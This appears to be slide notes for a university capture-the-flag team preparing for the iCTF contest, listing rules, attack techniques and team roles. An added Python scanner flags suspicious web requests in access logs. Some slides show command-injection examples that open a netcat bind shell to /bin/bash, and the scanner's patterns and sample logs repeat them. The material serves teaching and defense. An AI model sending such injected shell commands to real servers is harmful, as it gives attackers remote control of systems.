CAPTURE THE FLAG Introductions beer brew man dutchrowboat.


Teams
- Firewall
- IDS/IPS
- Services – Attack and Defense
- PHP, Perl, Ruby, Python, Java
- Analysis
- Wireshark, etc.
- C/ASM
- Operating System
- Apache, OS Configuration, etc.

iCTF
- Came from Defcon
- iCTF run by UCSB
- No test required – just edu
- “Largest existing live security exercise”
- Tests skills of understanding security

What is it?
- A variety of Internet-enabled services
- Services comprised of:
  - PHP
  - Perl
  - Shell Scripts
  - C++
  - MySQL
  - Apache/lighttpd
  - SSH
  - XML RPC
  - FTP

What to do
- All services should be protected
  - Patch
  - IPS/IDS
- All services should be attacked

Blender
- SNAT with weights?
- Is it real?

Rules
- No DOS
- All traffic is penalized
- Must stay on internal network
- Don't prevent legitimate traffic
- Don't break rules
- If attack service, don't launch DOS from compromised machine
- 2005 Defcon – hack the scorebot

Attack Techniques
- Buffer overflows
- Format string attacks
- Shell attacks
- Race conditions
- Misconfigurations
- Authentication attacks
- Web-based attacks
- Directory traversal
- Cookie-based services
- Cross-site scripting
- Server-side applications
- Lack of parameter validation (e.g., SQL injection)

Skills
- Scanning
- Firewalling
- Intrusion Detection
- Vulnerability analysis
- For each type of vulnerability
  - How to identify a vulnerability
  - How to exploit a vulnerability
  - How to patch a vulnerability (without disrupting the get/set flag methods)
  - How to detect a vulnerability
- For each service
  - How to monitor the requests to a service
  - How to monitor the execution of a request
- Protocol security analysis
- Application security analysis

Vigna's Suggestions
- Have a structured team with clear responsibilities
  - The Perl/Python/PHP group
  - The SQL/database group
  - The flaw-finder group
  - The firewall group
  - The IDS group
  - The C-based exploit group
- Have a leader responsible for coordination and integration
- Have a way to intercept socket connections and apply regexes/substitutions
- Have vulnerability analysis tools handy
- Have a “human IDS”
- Remember: the game lasts only a few hours

Not the first time…

2009

Questions ?

Backups…

[Diagram: Test Network and Real Network layout (team hub, team box, mon box, attack boxes, console for fixes, test box, UCCS boxes)]

Some Examples
- echo GET / | nc >./myoutput.txt
- php?command=nc -lp e /bin/bash
- php?command=nmap -p > port.txt
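
As an added example (not part of the original slides), here is the "monitor the requests to a service" skill applied to the request shapes listed above: a small scanner that URL-decodes query parameters in web access-log lines and flags values that look like netcat, shell or nmap invocations. The log lines, paths, addresses, port and pattern names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache common log format (not from the slides).
SAMPLE_LOG = [
    '10.0.3.7 - - [04/Dec/2009:17:02:11 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '10.0.5.9 - - [04/Dec/2009:17:02:40 +0000] "GET /status.php?command=nc%20-lp%204444%20-e%20/bin/bash HTTP/1.1" 200 0',
    '10.0.5.9 - - [04/Dec/2009:17:03:02 +0000] "GET /status.php?command=nmap+-p+1-1024+10.0.1.1 HTTP/1.1" 200 87',
    '10.0.2.4 - - [04/Dec/2009:17:03:30 +0000] "GET /search.php?q=netcat+tutorial HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Patterns are matched against URL-decoded parameter values, so %20 and +
# encodings cannot hide the space between a tool name and its options.
SUSPICIOUS = [
    ("netcat", re.compile(r"(?:^|[\s;|&])(?:nc|ncat|netcat)\s+-", re.I)),
    ("shell-path", re.compile(r"/bin/(?:ba)?sh\b")),
    ("nmap", re.compile(r"(?:^|[\s;|&])nmap\s", re.I)),
]

def scan_line(line):
    """Return a finding dict for one log line, or None if nothing matched."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    src, _method, target, status = m.groups()
    parts = urlsplit(target)
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        for label, rx in SUSPICIOUS:
            if rx.search(value):
                hits.append((name, label))
    if not hits:
        return None
    return {"src": src, "path": parts.path, "status": int(status), "hits": hits}

def scan_log(lines):
    """Scan an iterable of log lines and return only the lines with findings."""
    return [f for f in map(scan_line, lines) if f is not None]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The last sample line shows why the netcat pattern requires an option flag after the tool name: a search for "netcat tutorial" is legitimate traffic and is not flagged.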